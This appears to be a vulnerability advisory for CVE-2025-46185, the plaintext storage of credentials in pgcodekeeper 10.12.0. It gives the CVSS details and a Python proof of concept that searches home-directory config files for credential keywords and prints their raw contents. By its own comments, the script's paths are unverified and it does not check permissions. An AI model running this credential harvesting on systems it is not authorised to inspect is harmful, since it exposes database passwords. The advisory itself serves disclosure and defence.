An Insecure Permission vulnerability in pgcodekeeper 10.12.0 allows a local attacker to obtain sensitive information via the plaintext storage of passwords and usernames.
CVSS Details
CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Configurations (Affected Products)
No configuration data available.
pgcodekeeper 10.12.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46185 PoC - pgcodekeeper plaintext credential disclosure
# The attacker needs local access
import os
import json
from pathlib import Path
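def find_pgcodekeeper_config():
    """Scan candidate pgcodekeeper config files for credential keywords.

    Six hard-coded locations under the current user's home directory are
    checked. A file is reported when its text contains the substring
    ``password`` or ``username`` (case-insensitive).

    NOTE(review): the candidate locations are this script's own list; nothing
    here confirms which file pgcodekeeper 10.12.0 actually writes its
    connection data to -- verify against a real installation before relying
    on a clean result.

    A hit is only a keyword match: it does not prove that a usable secret is
    stored, and the file's permission bits are not inspected, so it says
    nothing about which other local accounts can read the file.

    Returns:
        A list of dicts, one per flagged file, with keys ``'path'`` (the
        expanded path) and ``'content'`` (the full file text). The content
        carries whatever secrets the file holds, so the return value should
        be handled as sensitive data.
    """
    candidate_locations = (
        "~/.pgcodekeeper/config.json",
        "~/.pgcodekeeper/connections.json",
        "~/.pgcodekeeper/settings.xml",
        "~/.pgcodekeeper/credentials.properties",
        "~/.config/pgcodekeeper/config.json",
        "~/.local/share/pgcodekeeper/config.json",
    )

    found_credentials = []
    for location in candidate_locations:
        path = os.path.expanduser(location)

        # Only regular files are read: a directory cannot be opened as text,
        # and a FIFO or device node at this path would block the read.
        if not os.path.isfile(path):
            continue
        print(f"[+] Found config file: {path}")

        try:
            # Decode explicitly and tolerate stray bytes so that a file in a
            # different encoding is still scanned instead of being skipped.
            with open(path, 'r', encoding='utf-8', errors='replace') as f:
                content = f.read()
        except OSError as e:
            print(f"[-] Error reading {path}: {e}")
            continue

        # Check for plaintext credentials (keyword presence only).
        lowered = content.lower()
        if 'password' in lowered or 'username' in lowered:
            print(f"[!] Potential credentials found in {path}")
            found_credentials.append({
                'path': path,
                'content': content,
            })

    return found_credentials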
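def main():
    """Print a report of the config files flagged by the scan.

    For every flagged file the path and the first 500 characters of its raw
    content are written to stdout. That preview is unredacted, so the output
    contains any credentials stored near the top of the file; keep it out of
    shared terminals, CI logs and tickets.
    """
    print("=== CVE-2025-46185 PoC ===")
    print("pgcodekeeper Plaintext Credential Storage\n")

    credentials = find_pgcodekeeper_config()
    if not credentials:
        # The scan returns only files that matched a keyword, so an empty
        # result also covers "files exist but none matched". The message
        # says so instead of claiming that no config file exists.
        print("[-] No pgcodekeeper config files containing credential keywords found")
        return

    print(f"\n[!] Found {len(credentials)} potential credential file(s)")
    for cred in credentials:
        print(f"\nFile: {cred['path']}")
        print("Content preview:")
        # Preview is capped at 500 characters of the stored file text.
        print(cred['content'][:500])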
# Run the report only when this file is executed as a script; importing it
# for its scan function must not trigger any file reads or output.
if __name__ == "__main__":
    main()